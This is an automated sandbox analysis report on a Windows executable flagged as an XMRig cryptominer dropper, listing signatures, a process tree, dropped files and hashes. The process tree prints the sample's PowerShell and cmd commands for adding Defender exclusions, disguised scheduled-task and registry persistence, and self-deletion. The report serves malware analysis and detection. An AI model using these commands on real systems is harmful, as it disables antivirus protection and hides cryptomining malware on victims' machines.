Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1800s
  • max time network
    1807s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 31 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3368
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:5000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2992
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Gu3PdXt79NF7EJXJ.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1464
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:4204
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:4364
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:3180
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:892
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:556
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:5052
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4932
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3076
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:4276
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4328

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            249KB

            MD5

            c688992422a2202c34bbcda0a21ff3ea

            SHA1

            793da53336d6ee5735440a58ad3eea645dc4105c

            SHA256

            8a669e45688a16df943f5dc07cc6756f4de382cfa89137b57857dd61f354cd80

            SHA512

            d90ccf4a1a6fde594351751f03663bb20874a519f346b31a1f9c551c795f57297fc3fb937c0d5c656d3531b2bdd9f3764234bb3f9869616bd04db4ca2012cc5b

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            286KB

            MD5

            76ae98f39f3e1d5a9ec6ff9dcae23141

            SHA1

            10d078b05b5d4d5b6492da4c2e841ac959110b89

            SHA256

            edf7bf68a421877f0d176f66b323f2119f11bbcc8a201bd4cd39a8a1e46aa1d9

            SHA512

            3eacdc4a3d905750a91b43b9e8803e64db1d9eb073fa24c66323ae43eefe16a0dde42bf136d01a64ffda9a81e5e6be7e68c4cd3632e513f96880c0b17301c46c

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            2979eabc783eaca50de7be23dd4eafcf

            SHA1

            d709ce5f3a06b7958a67e20870bfd95b83cad2ea

            SHA256

            006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

            SHA512

            92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            a16b84830c7c18df54f25c15d0f81951

            SHA1

            9d817fc72fbaf76175e677dec66002e9bdff6da0

            SHA256

            0d7a62ab7c299a90db4e2ec1a6c4b10e7bf17879f699f042728e7f4870c69a53

            SHA512

            98b62f81111e958787db2137649d7ae1769ae142dce1d824a8093283fac50846f59e0b1e1cfe26ed07322bee1c8ddad2bc1b18a0d69ecaa1f79c7a9bc26300b6

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rooe2bkv.1cy.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/768-47-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/768-52-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/768-48-0x0000021727A70000-0x0000021727A80000-memory.dmp
            Filesize

            64KB

          • memory/768-49-0x0000021727A70000-0x0000021727A80000-memory.dmp
            Filesize

            64KB

          • memory/892-111-0x0000024549A30000-0x0000024549A40000-memory.dmp
            Filesize

            64KB

          • memory/892-99-0x0000024549A30000-0x0000024549A40000-memory.dmp
            Filesize

            64KB

          • memory/892-112-0x0000024549A30000-0x0000024549A40000-memory.dmp
            Filesize

            64KB

          • memory/892-98-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/892-114-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/892-100-0x0000024549A30000-0x0000024549A40000-memory.dmp
            Filesize

            64KB

          • memory/2992-30-0x0000018EC8340000-0x0000018EC8350000-memory.dmp
            Filesize

            64KB

          • memory/2992-27-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/2992-34-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/2992-31-0x0000018EC8340000-0x0000018EC8350000-memory.dmp
            Filesize

            64KB

          • memory/2992-29-0x0000018EC8340000-0x0000018EC8350000-memory.dmp
            Filesize

            64KB

          • memory/2992-32-0x0000018EC8340000-0x0000018EC8350000-memory.dmp
            Filesize

            64KB

          • memory/3076-126-0x00007FF701FB0000-0x00007FF701FC6000-memory.dmp
            Filesize

            88KB

          • memory/3076-133-0x00007FF701FB0000-0x00007FF701FC6000-memory.dmp
            Filesize

            88KB

          • memory/3180-74-0x000002DB9A630000-0x000002DB9A64C000-memory.dmp
            Filesize

            112KB

          • memory/3180-83-0x000002DBFED40000-0x000002DBFED4A000-memory.dmp
            Filesize

            40KB

          • memory/3180-78-0x000002DBFF1F0000-0x000002DBFF20C000-memory.dmp
            Filesize

            112KB

          • memory/3180-79-0x000002DBFED00000-0x000002DBFED0A000-memory.dmp
            Filesize

            40KB

          • memory/3180-80-0x000002DBFF210000-0x000002DBFF22A000-memory.dmp
            Filesize

            104KB

          • memory/3180-81-0x000002DB9A850000-0x000002DB9A858000-memory.dmp
            Filesize

            32KB

          • memory/3180-82-0x000002DB9A860000-0x000002DB9A866000-memory.dmp
            Filesize

            24KB

          • memory/3180-77-0x000002DBFECF0000-0x000002DBFECFA000-memory.dmp
            Filesize

            40KB

          • memory/3180-84-0x000002DBFED60000-0x000002DBFED70000-memory.dmp
            Filesize

            64KB

          • memory/3180-87-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/3180-76-0x000002DB9A650000-0x000002DB9A705000-memory.dmp
            Filesize

            724KB

          • memory/3180-75-0x00007FF3FE2F0000-0x00007FF3FE300000-memory.dmp
            Filesize

            64KB

          • memory/3180-64-0x000002DBFED60000-0x000002DBFED70000-memory.dmp
            Filesize

            64KB

          • memory/3180-59-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/4276-123-0x00000273EB370000-0x00000273EB390000-memory.dmp
            Filesize

            128KB

          • memory/4276-144-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-188-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-186-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-184-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-182-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-180-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-124-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-178-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-125-0x00000273EB960000-0x00000273EB9A0000-memory.dmp
            Filesize

            256KB

          • memory/4276-176-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-127-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-128-0x00000273EB9A0000-0x00000273EB9C0000-memory.dmp
            Filesize

            128KB

          • memory/4276-129-0x00000273EB9C0000-0x00000273EB9E0000-memory.dmp
            Filesize

            128KB

          • memory/4276-131-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-132-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-174-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-134-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-136-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-137-0x00000273EB9A0000-0x00000273EB9C0000-memory.dmp
            Filesize

            128KB

          • memory/4276-138-0x00000273EB9C0000-0x00000273EB9E0000-memory.dmp
            Filesize

            128KB

          • memory/4276-140-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-142-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-172-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-146-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-148-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-150-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-152-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-154-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-156-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-158-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-160-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-162-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-164-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-166-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-168-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4276-170-0x00007FF6328E0000-0x00007FF6330D4000-memory.dmp
            Filesize

            8.0MB

          • memory/4328-53-0x00007FF669EB0000-0x00007FF66A0C1000-memory.dmp
            Filesize

            2.1MB

          • memory/4328-121-0x00007FF669EB0000-0x00007FF66A0C1000-memory.dmp
            Filesize

            2.1MB

          • memory/4804-16-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/4804-6-0x0000013367670000-0x0000013367692000-memory.dmp
            Filesize

            136KB

          • memory/4804-11-0x00007FFBABC90000-0x00007FFBAC751000-memory.dmp
            Filesize

            10.8MB

          • memory/4804-13-0x0000013367600000-0x0000013367610000-memory.dmp
            Filesize

            64KB

          • memory/4804-12-0x0000013367600000-0x0000013367610000-memory.dmp
            Filesize

            64KB

          • memory/5000-0-0x00007FF6685D0000-0x00007FF6687E1000-memory.dmp
            Filesize

            2.1MB

          • memory/5000-36-0x00007FF6685D0000-0x00007FF6687E1000-memory.dmp
            Filesize

            2.1MB